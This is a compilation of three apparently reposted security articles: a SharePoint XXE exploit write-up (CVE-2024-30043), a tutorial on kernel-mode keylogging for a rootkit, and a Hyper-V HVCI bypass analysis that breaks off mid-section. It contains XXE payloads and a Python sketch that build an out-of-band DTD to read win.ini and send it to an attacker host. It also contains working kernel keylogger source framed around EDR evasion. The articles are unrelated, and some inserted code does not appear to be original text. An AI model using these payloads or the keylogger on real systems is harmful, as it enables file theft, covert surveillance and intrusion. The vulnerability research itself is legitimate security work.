CVE-2024-30043: ABUSING URL PARSING CONFUSION TO EXPLOIT XXE ON SHAREPOINT SERVER AND CLOUD

Original text by Piotr Bazydło

Yes, the title is right. This blog covers an XML eXternal Entity (XXE) injection vulnerability that I found in SharePoint. The bug was recently patched by Microsoft. In general, XXE vulnerabilities are not very exciting in terms of discovery and related technical aspects. They may sometimes be fun to exploit and exfiltrate data (or do other nasty things) in real environments, but in the vulnerability research world, you typically find them, report them, and forget about them.

So why am I writing a blog post about an XXE? I have two reasons:

·       It affects SharePoint, both on-prem and cloud instances, which is a nice target. This vulnerability can be exploited by a low-privileged user.
·       This is one of the craziest XXEs that I have ever seen (and found), both in terms of vulnerability discovery and the method of triggering. When we talk about overall exploitation and impact, this Pwn2Own win by Chris Anastasio and Steven Seeley is still my favorite.

The vulnerability is known as CVE-2024-30043, and, as one would expect with an XXE, it allows you to:

·       Read files with SharePoint Farm Service account permission.
·       Perform Server-side request forgery (SSRF) attacks.
·       Perform NTLM Relaying.
·       Achieve any other side effects to which XXE may lead.

Let us go straight to the details.

BaseXmlDataSource DataSource

Microsoft.SharePoint.WebControls.BaseXmlDataSource is an abstract base class, inheriting from DataSource, for data source objects that can be added to a SharePoint page. A DataSource can be included in a SharePoint page in order to retrieve data (in a way specific to a particular DataSource). When a BaseXmlDataSource is present on a page, its Execute method will be called at some point during page rendering:

protected XmlDocument Execute(string request) // [1]
{
    SPSite spsite = null;
    try
    {
        if (!BaseXmlDataSource.GetAdminSettings(out spsite).DataSourceControlEnabled)
        {
            throw new DataSourceControlDisabledException(SPResource.GetString("DataSourceControlDisabled", new object[0]));
        }
        string text = this.FetchData(request); // [2]
        if (text != null && text.Length > 0)
        {
            XmlReaderSettings xmlReaderSettings = new XmlReaderSettings();
            xmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit; // [3]
            XmlTextReader xmlTextReader = new XmlTextReader(new StringReader(text));
            XmlSecureResolver xmlResolver = new XmlSecureResolver(new XmlUrlResolver(), request); // [4]
            xmlTextReader.XmlResolver = xmlResolver; // [5]
            XmlReader xmlReader = XmlReader.Create(xmlTextReader, xmlReaderSettings); // [6]
            try
            {
                do
                {
                    xmlReader.Read(); // [7]
                }
                while (xmlReader.NodeType != XmlNodeType.Element);
            }
            ...
        }
        ...
    }
    ...
}

At [1], you can see the Execute method, which accepts a string called request. We fully control this string, and it should be a URL (or a path) pointing to an XML file. Later, I will refer to this string as DataFile.

At this point, we can divide this method into two main parts: XML fetching and XML parsing.

       a) XML Fetching

At [2], this.FetchData is called and our URL is passed as an input argument. BaseXmlDataSource does not implement this method (it’s an abstract class).

FetchData is implemented in three classes that extend our abstract class:
• SoapDataSource — performs an HTTP SOAP request and retrieves a response (XML).
• XmlUrlDataSource — performs a customizable HTTP request and retrieves a response (XML).
• SPXmlDataSource — retrieves an existing specified file from the SharePoint site.

We will revisit those classes later.

       b) XML Parsing

At [3], the xmlReaderSettings.DtdProcessing member is set to DtdProcessing.Prohibit, which should disable the processing of DTDs.

At [4] and [5], the xmlTextReader.XmlResolver is set to a freshly created XmlSecureResolver. The request string, which we fully control, is passed as the securityUrl parameter when creating the XmlSecureResolver.

At [6], the code creates a new instance of XmlReader.

Finally, it reads the contents of the XML using a do-while loop at [7].

At first glance, this parsing routine seems correct. The document type definition (DTD) processing of our XmlReaderSettings instance is set to Prohibit, which should block all DTD processing. On the other hand, we have the XmlResolver set to XmlSecureResolver.

In my experience, it is very rare to see .NET code where:
• DTDs are blocked through XmlReaderSettings.
• Some XmlResolver is still defined.

I decided to play around and sent a general entity-based payload to some test code I wrote, similar to the code shown above (I only replaced XmlSecureResolver with XmlUrlResolver for testing purposes):

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY b SYSTEM "http://attacker/poc.txt">
]>
<r>&b;</r>

As expected, no HTTP request was performed, and a DTD processing exception was thrown. What about this payload?

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY % sp SYSTEM "http://attacker/poc.xml">
%sp;
]>
<a>wat</a>

It was a massive surprise to me, but the HTTP request was performed! Accordingly, it seems that when you have .NET code where:
• XmlReader is used with XmlTextReader and XmlReaderSettings,
• XmlReaderSettings.DtdProcessing is set to Prohibit, and
• an XmlTextReader.XmlResolver is set,

the resolver will first try to handle the parameter entities, and only afterwards perform the DTD prohibition check! An exception will be thrown in the end, but it still allows you to exploit the out-of-band XXE and potentially exfiltrate data (using, for example, an HTTP channel).
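To show how this parameter-entity primitive is typically weaponized, here is a sketch in Python that builds the classic two-stage out-of-band exfiltration payload. The attacker host, the hosted DTD name, and the target file are hypothetical placeholders, not values from the original research:

```python
# Sketch: building the classic parameter-entity OOB exfiltration pair.
# "attacker.example" and the target file path are illustrative placeholders.

ATTACKER = "http://attacker.example"
TARGET_FILE = "file:///c:/windows/win.ini"

# evil.dtd, hosted on the attacker server: reads the file into %file;,
# then builds an exfiltration entity whose SYSTEM URL embeds the contents.
evil_dtd = (
    f'<!ENTITY % file SYSTEM "{TARGET_FILE}">\n'
    f'<!ENTITY % wrap "<!ENTITY &#x25; send SYSTEM \'{ATTACKER}/?d=%file;\'>">\n'
    '%wrap;\n'
    '%send;\n'
)

# The XML handed to the vulnerable parser only needs the external
# parameter entity -- exactly the construct that slipped past
# DtdProcessing.Prohibit above.
payload = (
    '<?xml version="1.0" ?>\n'
    '<!DOCTYPE a [\n'
    '<!ELEMENT a ANY >\n'
    f'<!ENTITY % sp SYSTEM "{ATTACKER}/evil.dtd">\n'
    '%sp;\n'
    ']>\n'
    '<a>wat</a>\n'
)
```

The first stage (`%sp;`) pulls the external DTD; the second stage inside the DTD expands the file contents into an outgoing request URL.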

The XXE is there, but we have to solve two mysteries:

• How can we properly fetch the XML payload in SharePoint?
• What’s the deal with this XmlSecureResolver?

XML Fetching and XmlSecureResolver

As I have already mentioned, there are three classes that extend our vulnerable BaseXmlDataSource. Their FetchData method is used to retrieve the XML content based on our URL. Then, this XML will be parsed with the vulnerable XML parsing code.

Let’s summarize those three classes:

       a) XmlUrlDataSource
       • Accepts URLs with a protocol set to either http or https.
       • Performs an HTTP request to fetch the XML content. This request is customizable. For example, we can select which HTTP method we want to use.
       • Some SSRF protections are implemented. This class won’t allow you to make HTTP requests to local addresses such as 127.0.0.1 or 192.168.1.10. Still, you can use it freely to reach external IP address space.

       b) SoapDataSource
       • Almost identical to the first one, although it allows you to perform SOAP requests only (the body must contain valid XML, plus additional restrictions).
       • The same SSRF protections exist as in XmlUrlDataSource.

       c) SPXmlDataSource
       • Allows retrieval of the contents of SharePoint pages or documents. If you have a file test.xml uploaded to the sample site, you can provide a URL as follows: /sites/sample/test.xml.

At this point, those HTTP-based classes look like a great match. We can:
• Create an HTTP server.
• Fetch malicious XML from our server.
• Trigger the XXE and potentially read files from the SharePoint server.

Let’s test this. I’m creating an XmlUrlDataSource, and I want it to fetch the XML from this URL:

       http://attacker.com/poc.xml

poc.xml contains the following payload:

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY % sp SYSTEM "http://localhost/test">
%sp;
]>

The plan is simple. I want to test the XXE by executing an HTTP request to localhost (SSRF).

We must also remember that whatever URL we specify as our source also becomes the securityUrl of the XmlSecureResolver. Accordingly, this is what will be executed:

Figure 1 XmlSecureResolver initialization

Who cares anyway? YOLO, let’s move along with the exploitation. Unfortunately, this is the exception that appears when we try to execute this attack:


The action that failed was:
Demand
The type of the first permission that failed was:
System.Net.WebPermission
The first permission that failed was: <IPermission class="System.Net.WebPermission, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" version="1">
<ConnectAccess>
<URI uri="http://localhost/test"/>
</ConnectAccess>
</IPermission>

Figure 2 Exception thrown during XXE->SSRF

It seems that the “Secure” in XmlSecureResolver stands for something. In general, it is a wrapper around various resolvers that allows you to apply some resource-fetching restrictions. Here is a fragment of the Microsoft documentation:

“Helps to secure another implementation of XmlResolver by wrapping the XmlResolver object and restricting the resources that the underlying XmlResolver has access to.”

In general, it is based on Microsoft Code Access Security. Depending on the provided URL, it creates some resource access rules. Let’s see a simplified example for http://attacker.com/test.xml:

Figure 3 Simplified sample restrictions applied by XmlSecureResolver

In short, it creates restrictions based on the protocol, the hostname, and a couple of other things (like an optional port, which is not applicable to all protocols). If we fetch our XML from http://attacker.com, we won’t be able to make a request to http://localhost, because the host does not match.

The same goes for the protocol. If we fetch XML from the attacker’s HTTP server, we won’t be able to access local files with the XXE, because neither the protocol (http:// versus file://) nor the host match as required.
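The policy described above can be modeled with a small Python sketch. This is a toy approximation of the origin-based restriction, assuming a same-scheme/same-host rule with an unrestricted file:// origin; it is not the real Code Access Security logic:

```python
from urllib.parse import urlsplit

def allowed(security_url: str, requested: str) -> bool:
    """Toy model: a fetch is allowed only when scheme and host match the
    URL the XML came from; file:// origins get an unrestricted policy."""
    origin = urlsplit(security_url)
    if origin.scheme == "file":
        return True  # local origin -> assume full trust, no restrictions
    target = urlsplit(requested)
    return (origin.scheme, origin.hostname) == (target.scheme, target.hostname)

# XML fetched over HTTP: same-origin only.
assert allowed("http://attacker.com/poc.xml", "http://attacker.com/x")
assert not allowed("http://attacker.com/poc.xml", "http://localhost/test")
assert not allowed("http://attacker.com/poc.xml", "file:///c:/windows/win.ini")
# XML (apparently) loaded from the file system: everything goes.
assert allowed("file://localhost/c$/whatever", "http://attacker.com/exfil")
```

This is exactly why an HTTP-sourced payload can only talk back to its own server, while a file://-sourced one could do anything.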

To summarize, this XXE is useless so far. Even though we can technically trigger the XXE, it only allows us to reach our own server, which we can also achieve with the intended functionality of our SharePoint sources (such as XmlUrlDataSource). We need to figure out something else.

SPXmlDataSource and URL Parsing Issues

At this point, I was not able to abuse the HTTP-based sources. I tried to use SPXmlDataSource with the following request:

       /sites/mysite/test.xml

The idea is simple. We are a SharePoint user, and we can upload files to some sites. We upload our malicious XML to the http://sharepoint/sites/mysite/test.xml document, and then we:
       • Create an SPXmlDataSource.
       • Set DataFile to /sites/mysite/test.xml.

SPXmlDataSource will successfully retrieve our XML. What about XmlSecureResolver? Unfortunately, such a path (without a protocol) will lead to a very restrictive policy, which does not allow us to leverage this XXE.

This made me wonder about the URL parsing. I knew that I could not abuse the HTTP-based XmlUrlDataSource and SoapDataSource. The code was written in C# and it was pretty straightforward to read; URL parsing looked good there. On the other hand, the URL parsing of SPXmlDataSource is performed by some unmanaged code, which cannot be easily decompiled and read.

I started thinking about the following potential exploitation scenario:
       • Delivering a “malformed” URL.
       • SPXmlDataSource somehow manages to handle this URL and retrieves my uploaded XML successfully.
       • The URL gives me an unrestricted XmlSecureResolver policy, and I’m able to fully exploit the XXE.

This idea seemed good, and I decided to investigate the possibilities. First, we have to figure out when XmlSecureResolver gives us a nice policy, which allows us to:
       • Access the local file system (to read file contents).
       • Perform HTTP communication to any server (to exfiltrate data).

Let’s deliver the following URL to XmlSecureResolver:

       file://localhost/c$/whatever

Bingo! XmlSecureResolver creates a policy with no restrictions! It thinks that we are loading the XML from the local file system, which means that we probably already have full access and can do anything we want.

Such a URL is not something that we should be able to deliver to SPXmlDataSource or any other data source that we have available. None of them is based on the local file system, and even if they were, we would not be able to upload files there.

Still, we don’t know how SPXmlDataSource handles URLs. Maybe my dream attack scenario with a malformed URL is possible? Before even trying to reverse the appropriate function, I started playing around with this SharePoint data source, and surprisingly, I found a solution quickly:

       

file://localhost\c$/sites/mysite/test.xml

Let’s see how SPXmlDataSource handles it (based on my observations):

Figure 4 SPXmlDataSource — handling of malformed URL

This is awesome. Such a URL allows us to retrieve the XML that we can freely upload to SharePoint. On the other hand, it gives us an unrestricted access policy in XmlSecureResolver! This URL parsing confusion between those two components gives us the possibility to fully exploit the XXE and perform a file read.
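The disagreement between the two components can be sketched in Python. This is a toy model of the two observed behaviors, not SharePoint’s actual unmanaged parser: a strict RFC-style parser sees a trusted file:// origin, while a lenient, backslash-normalizing one recovers a server-relative SharePoint path:

```python
from urllib.parse import urlsplit

URL = "file://localhost\\c$/sites/mysite/test.xml"

# Strict RFC 3986 view (what XmlSecureResolver effectively keys on):
# backslashes are ordinary characters, so the scheme is file:// and the
# apparent origin is the local file system -> unrestricted policy.
parts = urlsplit(URL)
assert parts.scheme == "file"

# Lenient, Windows-path-flavored view (modeling SPXmlDataSource's observed
# behavior): normalize backslashes, drop the file://host/share prefix, and
# keep only the server-relative part that SharePoint resolves.
normalized = URL.replace("\\", "/")          # file://localhost/c$/sites/...
site_relative = "/" + normalized.split("/", 4)[4]
assert site_relative == "/sites/mysite/test.xml"
```

One string, two contradictory interpretations: the resolver grants full trust while the data source happily serves our uploaded XML.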

The entire attack scenario looks like this:

Figure 5 SharePoint XXE — entire exploitation scenario

Demo

Let’s have a look at the demo to visualize things better. It presents the full exploitation process, together with the debugger attached. You can see that:
       • SPXmlDataSource fetches the malicious XML file, even though the URL is malformed.
       • XmlSecureResolver creates an unrestricted access policy.
       • The XXE is exploited and we retrieve the win.ini file.
       • The “DTD prohibited” exception is eventually thrown, but we were still able to abuse the OOB XXE.

The Patch

The patch from Microsoft implemented two main changes:
       • More URL parsing controls for SPXmlDataSource.
       • The XmlTextReader object also prohibits DTD usage (previously, only XmlReaderSettings did that).

In general, I find .NET XXE-protection settings way trickier than the ones that you can define in various Java parsers. This is because you can apply them to objects of different types (here: XmlReaderSettings versus XmlTextReader). When XmlTextReader prohibits DTD usage, parameter entities seem never to be resolved, even with the resolver specified (that’s how this patch works). On the other hand, when XmlReaderSettings prohibits DTDs, parameter entities are resolved when the XmlUrlResolver is used. You can easily get confused here.

Summary

A lot of us thought that XXE vulnerabilities were almost dead in .NET. Still, it seems that you may sometimes spot some tricky implementations and corner cases that may turn out to be vulnerable. A careful review of .NET XXE-related settings is not an easy task (they are tricky) but may eventually be worth a shot.

I hope you liked this writeup. I have a huge line of upcoming blog posts, but the vulnerabilities are waiting for their patches (including one more SharePoint vulnerability). Until my next post, you can follow me @chudypb and follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.

Keylogging in the Windows Kernel with undocumented data structures

Original text by eversinc33

If you are into rootkits and offensive Windows kernel driver development, you have probably watched the talk Close Encounters of the Advanced Persistent Kind: Leveraging Rootkits for Post-Exploitation, by Valentina Palmiotti (@chompie1337) and Ruben Boonen (@FuzzySec), in which they talk about using rootkits for offensive operations. I do believe that rootkits are the future of post-exploitation and EDR evasion — EDR is getting tougher to evade in userland, and Windows drivers are full of vulnerabilities which can be exploited to deploy rootkits. One part of this talk, however, particularly caught my interest: around the 16-minute mark, Valentina talks about kernel-mode keylogging. She describes the abstract process of how they achieve this in their rootkit as follows:

The basic idea revolves around gafAsyncKeyState (gaf = global af?), an undocumented kernel structure in win32kbase.sys used by NtUserGetAsyncKeyState (this structure exists up to Windows 10 — more on that at the end, or in the talk linked above).

By first locating and then parsing this structure, we can read keystrokes the way that NtUserGetAsyncKeyState does, without calling any APIs at all.

As always, game cheaters have been ahead of the curve, since they have been battling anticheats in the kernel for a long time. One thread explaining this technique dates back to 2019, for example.

In the talk, they also give the idea of mapping this memory into a usermode virtual address, to then poll it from a usermode process. I roughly implemented their approach, but skipped the memory mapping part, as in my rootkit Banshee I might as well (for now) read from the kernel directly. In this short post I want to give an idea of how I approached the implementation, with the talk as a guideline.

Implementation

The first challenge is of course to locate gafAsyncKeyState. Since the offset of gafAsyncKeyState relative to the win32kbase.sys base address differs across versions of Windows, we have to resolve it dynamically. One common technique is to look for a function that accesses the structure in some instruction, find that instruction, and then read out the target address.

Signature scanning

We know that NtUserGetAsyncKeyState needs to access this array. We can verify this by looking at the disassembly of NtUserGetAsyncKeyState in IDA and spotting a reference to our target structure, next to a MOV rax, qword ptr instruction.

This is the first MOV rax, qword ptr since the beginning of the function — thus we can locate it by simply scanning for the first occurrence of the bytes corresponding to that instruction (starting from the function’s beginning) and reading the offset from the operand.

The MOV rax, qword ptr instruction is represented in bytes as follows:

0x48 0x8B 0x05 ["32 bit offset"];

So if we find that pattern and extract the offset, we can calculate the address of our target structure gafAsyncKeyState.

Code for finding such a pattern in C++ is simple. You (and I, lol) should probably write a signature scanning engine, since this is a common task in a rootkit that deals with dynamic offsets, but for now a naive implementation shall suffice. However, there is one more hurdle.
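The scan and the RIP-relative arithmetic can be sketched in Python to make the offset math explicit. This is an illustrative model operating on a plain byte buffer; the names and the fake buffer are mine, not from Banshee:

```python
import struct

SIG = bytes([0x48, 0x8B, 0x05])  # MOV rax, qword ptr [rip+disp32]

def resolve_rip_relative(code: bytes, base: int, max_scan: int = 500) -> int:
    """Scan forward from `base` (the function start) for the first
    48 8B 05 disp32 instruction and return the absolute target address:
    address of the next instruction + signed 32-bit displacement."""
    i = code.find(SIG, 0, max_scan)
    if i < 0:
        raise LookupError("signature not found")
    disp32 = struct.unpack_from("<i", code, i + 3)[0]  # little-endian, signed
    # 3 opcode bytes + 4 displacement bytes = 7 bytes to the next instruction
    return base + i + 7 + disp32

# Fake function body: two junk bytes, then the target instruction with
# a displacement of 0x100.
fake = b"\x90\x90" + SIG + struct.pack("<i", 0x100)
assert resolve_rip_relative(fake, base=0x1000) == 0x1000 + 2 + 7 + 0x100
```

This mirrors the C++ below: `address = ntUserGetAsyncKeyState + (i + 3) + 4 + offset`.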

Session driver address space

If we try to access the memory of win32kbase with WinDbg attached to our kernel, we will see that (usually) we are not able to read the memory at that address.

This is because the win32kbase.sys driver is a session driver and operates in session space, a special area of system memory that is only readable through a process running in a session. This makes sense, as keystrokes should be handled differently for every user that has a session connected.

Thus, to access this memory, we will first have to attach to a process running in the target session. In WinDbg, this is possible with the !session command. In our driver, we will have to call KeStackAttachProcess, and afterwards, KeUnstackDetachProcess.

A common process to choose is winlogon.exe, as you can be sure it is always running and attached to a session. Another common choice seems to be csrss.exe, but make sure to choose the right one, as only one of the two commonly running instances runs in a session context.

Putting it all together, here we have simple code to resolve the address of gafAsyncKeyState. Error handling is omitted for brevity, and some functions (e.g. GetSystemRoutineAddress, LOG_MSG, or GetPidFromProcessName) are own implementations, but should be trivial to recreate and are self-explanatory. Otherwise, you can look them up in Banshee:

PVOID Resolve_gafAsyncKeyState()
{
    KAPC_STATE apc;
    PVOID address = 0;
    PEPROCESS targetProc = 0;

    // Resolve winlogon's PID
    UNICODE_STRING processName;
    RtlInitUnicodeString(&processName, L"winlogon.exe");
    HANDLE procId = GetPidFromProcessName(processName); 
    PsLookupProcessByProcessId(procId, &targetProc);
        
    // Get Address of NtUserGetAsyncKeyState
    DWORD64 ntUserGetAsyncKeyState = (DWORD64)GetSystemRoutineAddress(Win32kBase, "NtUserGetAsyncKeyState");

    // Attach to winlogon.exe to enable reading of session space memory
    KeStackAttachProcess(targetProc, &apc);

    // Starting from NtUserGetAsyncKeyState, look for our byte signature
    INT i = 0;
    for (; i < 500; ++i)
    {
        if (
            *(BYTE*)(ntUserGetAsyncKeyState + i)     == 0x48 &&
            *(BYTE*)(ntUserGetAsyncKeyState + i + 1) == 0x8b &&
            *(BYTE*)(ntUserGetAsyncKeyState + i + 2) == 0x05
        )
        {
            // MOV rax qword ptr instruction found!
            // The 32bit param is the offset from the next instruction to the address of gafAsyncKeyState
            UINT32 offset = (*(PUINT32)(ntUserGetAsyncKeyState + i + 3));
            // Calculate the address: the address of NtUserGetAsyncKeyState + our current offset while scanning + 4 bytes for the 32bit parameter itself + the offset parsed from the parameter = our target address
            address = (PVOID)(ntUserGetAsyncKeyState + (i + 3) + 4 + offset); 
            break;
        }
    }

    LOG_MSG("Found address to gafAsyncKeyState at offset [NtUserGetAsyncKeyState]+%i: 0x%llx\n", i, address);

    // Detach from the process
    KeUnstackDetachProcess(&apc);
    
    ObDereferenceObject(targetProc);
    return address;
}

With the address of our structure of interest, we now just need to find out how we can parse it.

Parsing keystrokes

While I first started to reverse engineer NtUserGetAsyncKeyState in Ghidra, it came to my mind that folks way smarter than me had already done that, and I looked up the function in ReactOS.

Here, we can see how this function simply accesses the gafAsyncKeyState array with the IS_KEY_DOWN macro to determine if a key is pressed, according to its virtual key-code.

The IS_KEY_DOWN macro simply checks if the bit corresponding to the virtual key-code is set and returns TRUE if it is. So our structure, gafAsyncKeyState, is simply an array of bits that correspond to the states of our keys.

All that is left now is to copy and paste these macros and implement some basic polling logic (what key is down, was it down last time, …).

// https://github.com/mirror/reactos/blob/c6d2b35ffc91e09f50dfb214ea58237509329d6b/reactos/win32ss/user/ntuser/input.h#L91
#define GET_KS_BYTE(vk) ((vk) * 2 / 8)
#define GET_KS_DOWN_BIT(vk) (1 << (((vk) % 4)*2))
#define GET_KS_LOCK_BIT(vk) (1 << (((vk) % 4)*2 + 1))
#define IS_KEY_DOWN(ks, vk) (((ks)[GET_KS_BYTE(vk)] & GET_KS_DOWN_BIT(vk)) ? TRUE : FALSE)
#define SET_KEY_DOWN(ks, vk, down) (ks)[GET_KS_BYTE(vk)] = ((down) ? \
                                                            ((ks)[GET_KS_BYTE(vk)] | GET_KS_DOWN_BIT(vk)) : \
                                                            ((ks)[GET_KS_BYTE(vk)] & ~GET_KS_DOWN_BIT(vk)))

UINT8 keyStateMap[64] = { 0 };
UINT8 keyPreviousStateMap[64] = { 0 };
UINT8 keyRecentStateMap[64] = { 0 };

VOID UpdateKeyStateMap(const HANDLE& procId, const PVOID& gafAsyncKeyStateAddr)
{
    // Save the previous state of the keys
    memcpy(keyPreviousStateMap, keyStateMap, 64);

    // Copy over the array into our buffer
    SIZE_T size = 0;
    MmCopyVirtualMemory(
        BeGetEprocessByPid(HandleToULong(procId)),
        gafAsyncKeyStateAddr,
        PsGetCurrentProcess(), 
        &keyStateMap,
        sizeof(UINT8[64]),
        KernelMode,
        &size
    );

    // for each keycode ...
    for (auto vk = 0u; vk < 256; ++vk) 
    {
        // ... if key is down but wasn't previously, set it in the recent-state-map as down
        if (IS_KEY_DOWN(keyStateMap, vk) && !(IS_KEY_DOWN(keyPreviousStateMap, vk)))
        {
            SET_KEY_DOWN(keyRecentStateMap, vk, TRUE);
        }
    }
}

BOOLEAN
WasKeyPressed(UINT8 vk)
{
    // Check if a key was pressed since last polling the key state
    BOOLEAN result = IS_KEY_DOWN(keyRecentStateMap, vk);
    SET_KEY_DOWN(keyRecentStateMap, vk, FALSE);
    return result;
}
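The bit layout behind those macros can be mirrored in Python to make the arithmetic concrete: each virtual key-code owns two bits (a "down" bit and a "lock" bit), packed four keys per byte. An illustrative sketch (names are mine, not from the driver):

```python
# Python mirror of the ReactOS key-state macros: 256 keys * 2 bits = 64 bytes.

def ks_byte(vk: int) -> int:
    return (vk * 2) // 8            # GET_KS_BYTE

def ks_down_bit(vk: int) -> int:
    return 1 << ((vk % 4) * 2)      # GET_KS_DOWN_BIT

def is_key_down(ks: bytearray, vk: int) -> bool:
    return bool(ks[ks_byte(vk)] & ks_down_bit(vk))   # IS_KEY_DOWN

state = bytearray(64)
VK_A = 0x41                         # virtual key-code for 'A'

state[ks_byte(VK_A)] |= ks_down_bit(VK_A)   # simulate SET_KEY_DOWN(..., TRUE)
assert ks_byte(VK_A) == 16                  # 'A' lives in byte 0x41 // 4
assert is_key_down(state, VK_A)
assert not is_key_down(state, 0x42)         # 'B' shares the byte, untouched
```

Note how keys 0x40 through 0x43 all share byte 16, each claiming a different pair of bits.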
    

Then, we can call 

WasKeyPressed
 at a regular interval to poll for keystrokes and process them in any way we like:

#define VK_A 0x41

VOID KeyLoggerFunction()
{
    while (true)
    {
        UpdateKeyStateMap(procId, gafAsyncKeyStateAddr);

        // POC: just check if A is pressed
        if (WasKeyPressed(VK_A))
        {
            LOG_MSG("A pressed\n");
        }

        // Sleep for 0.1 seconds
        LARGE_INTEGER interval;
        interval.QuadPart = -1 * (LONGLONG)100 * 10000; 
        KeDelayExecutionThread(KernelMode, FALSE, &interval);
    }
}

Logging a keystroke to the kernel debug log works as a simple PoC for the technique — whenever the A key is pressed, we get a debug log in WinDbg.

You can read the messy code at https://github.com/eversinc33/Banshee.

Some more things to do or look out for are:

  • Implement it for Windows >= 11 — the structure is the same, it is just named differently and needs to be dereferenced a few times to reach the array.
  • If you are interested, go with the approach mentioned by Valentina, mapping the structure into usermode to read it from there.

Happy Hacking!

Hunting down the HVCI bug in UEFI

Original text by Satoshi’s notes


This post was coauthored with Andrea Allievi (@aall86), a Windows Core OS engineer who analyzed and fixed the issue.


This post details the story and technical details of the non-secure Hypervisor-Protected Code Integrity (HVCI) configuration vulnerability disclosed and fixed with the January 9th update on Windows. This vulnerability, CVE-2024-21305, allowed arbitrary kernel-mode code execution, effectively bypassing HVCI within the root partition.

While analysis of the HVCI bypass bug alone can be interesting enough, Andrea and I found that the process of root causing and fixing it would also be fun to detail, and we decided to write this up together. The first half of this article was authored by me, and the second half by Andrea. Readers can expect a great deal of Windows internals and x64 architecture details thanks to Andrea’s contribution!

Discovery to reporting

Discovery

The discovery of the bug was one of the by-products of hvext.js, the Windbg extension for studying the implementation of Hyper-V on Intel processors. With the extension, I dumped EPT on a few devices to better understand the implementation of HVCI, and one of them showed readable, writable, and kernel-mode executable (later referred to as RWX) guest physical addresses (GPAs). When HVCI is enabled, such GPAs should not exist as it would allow generation and execution of arbitrary code in kernel-mode. Eventually, out of 7 Intel devices I had, I found 3 devices with this issue, ranging from 6th to 10th generation processors.

Exploitation

Exploiting this issue for verification purposes was trivial, as the RWX GPAs did not change across reboots or when test-signing was enabled. I wrote a driver that remapped a linear address of my choice onto one of the RWX GPAs and placed shellcode there, and I was able to execute the shellcode as expected! If HVCI were working as intended, the PoC driver would have failed to write the shellcode and caused a bug check. For more details on the PoC, see the report on GitHub.

I asked Andrea about this and was told it could be a legit issue.

Partial root causing

I was curious why the issue was seen on only some devices and started to investigate what the RWX GPAs were.

Contents of those GPAs all seemed zero during runtime, and RamMap indicated it was outside NTOS-managed memory. I dumped memory during the Winload debug session, but they were still vastly zero. It was the same even during the UEFI shell phase.

At this point, I thought it might be UEFI-reserved regions. First, I realized that the RWX GPAs were parts of Reserved regions but did not exactly match, per the output of the memmap UEFI shell command. Shortly after, I discovered the regions exactly corresponded to the ranges reported by the Reserved Memory Region Reporting (RMRR) structure in the DMAR ACPI table.

I spent more time trying to understand why they were marked as RWX and why it occurred on only some machines. Eventually, I could not get the answers, but I was already reasonably satisfied with my findings and decided to hand this over to MSFT.

Reporting

I sent an initial write-up to Andrea, then, an updated one to MSRC a few days later. Though, it turned out that Andrea was the engineer in charge of this case. Such a small world.

Nothing much happened until mid-October when Andrea privately let me know he root caused and fixed it, and also offered to write up technical details from his perspective.

So the following is his write-up with a lot of technical details!

Technical details and fixes

Intel VT-x and its limitation

So what is the DMAR table and why was important in this bug?

To understand it we should take a step back and briefly introduce one of the first improvements to the Intel Virtualization Extension (Intel VT-x). Intel VT-x was introduced back around the year 2004 and, in its initial implementation, it was missing some parts of the technology that are currently used in modern operating systems (in 2023). In particular:

  1. The specification did not include a hardware Stage-2 MMU able to perform the translation of Guest Physical Addresses (GPAs) to System Physical Addresses (SPAs). The first Hypervisors (like VMware) used a technique called Memory Shadowing.
  2. Similarly, the specification did not protect devices performing DMA to system memory addresses.

As the reader can imagine, this was not compatible with the security standards required nowadays, so multiple “addendums” were added to the first implementation. While in this article we are not talking about #1 (plenty of articles are available online, like this one), we will give a short introduction to and description of the Intel VT-d technology, which aims at protecting device data transfers initiated via DMA.

Intel VT-d

Intel maintains the VT-d technology specifications at the following URL: https://www.intel.com/content/www/us/en/content-details/774206/intel-virtualization-technology-for-directed-i-o-architecture-specification.html

The document is updated quite often (at the time of this writing, we are at revision 4.1) and explains how an I/O memory management unit (IOMMU) can now prevent devices from accessing memory that belongs to another VM or is reserved for the host Hypervisor or OS.

A device can be exposed by the Hypervisor in different ways:

  • Emulated devices always cause a VMEXIT, and they are emulated by a component in the virtualization stack.
  • Paravirtualized devices are synthetic devices that communicate with the host device through a technology implemented in the host Hypervisor (VmBus in the case of Hyper-V).
  • Hardware-accelerated devices are mapped directly into the VM (readers who want to know more can check Chapter 9 of the Windows Internals book).

All the hardware devices are directly mapped in the root partition by the HV. To correctly support hardware-accelerated devices in a child VM, the HV needs an IOMMU. But what exactly is an IOMMU? To be able to isolate and restrict device accesses to just the resources owned by the VM (or by the root partition), an IOMMU should provide the following capabilities:

  • I/O device assignment
  • DMA remapping to support address translations for Direct Memory Accesses (DMA) initiated by the devices
  • Interrupt remapping and posting for supporting isolation and routing of interrupts to the appropriate VM

DMA remapping

The DMA remapping capability is the feature related to the bug found in the Hypervisor. Indeed, to properly isolate DMA requests coming from hardware devices, an IOMMU must translate each request coming from an endpoint device attached to the Root Complex (in its simplest form, a DMA request is composed of a target DMA address/size and an originating device ID specified as Bus/Dev/Function, or BDF) into the corresponding Host Physical Address (HPA).

Note that readers who do not know what a Root Complex is, or how PCI-Express devices interact with the system memory bus, can read the excellent article by Gbps located here (he told me that a part 2 is coming soon 🙂 ).

The IOMMU defines the concept of a Domain: an isolated environment in the platform to which a subset of host physical memory is allocated (basically a bunch of isolated physical memory pages). The isolation property of a domain is achieved by blocking access to its physical memory from resources not assigned to it. Software creates and manages domains, allocates the backing physical memory (SPAs), and sets up the DMA address translation function using “Device-to-Domain Mapping” and “Hierarchical Address Translation” structures.

Skipping a lot of details, both structures can be thought of as “special” page tables:

  • Device-to-Domain Mapping structures are addressed by the BDF of the source device. In the Intel manual this is called the “Source ID”; the lookup yields back the domain ID and the root of the address translation structures for the domain (yes, entries in this table are indeed 128 bits, not 64).
  • Hierarchical Address translation structures are addressed by the source DMA address, which is treated as GPA, and outputs the final Host Physical address used as target for the DMA transfer.

The concepts above are described by the following figure (source: Intel Manual):

DMAR ACPI table and RMRR structure

